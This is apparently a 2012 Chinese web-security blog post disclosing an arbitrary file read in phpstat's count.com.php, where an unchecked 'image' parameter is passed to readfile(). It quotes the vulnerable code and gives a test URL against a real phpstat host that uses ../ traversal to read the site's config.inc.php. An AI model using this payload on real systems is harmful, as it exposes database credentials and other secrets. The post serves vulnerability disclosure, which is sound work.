← 返回首页

phpstat 读文件

作者:Cond0r
发布时间:2012-10-19 21:39:24
浏览:3981    评论:13

phpstat 读文件

2012-10-19 21:39:24 13 3981
./count/count.com.php
$website = $_GET[website];
        $image = $_GET[image];
        //确定图片
        if(!$image)
        $imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";
        else
        $imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;
        //发送图片
       
    header("Content-type: image/gif");
        readfile($imagesrc);
        @flush();
很2B,看一个站的时候发现。。
test
http://media.phpstat.net/count/count.com.php?image=../../../../include.inc/config.inc.php
类别 Web安全

关于作者

Cond0r136篇文章1277篇回复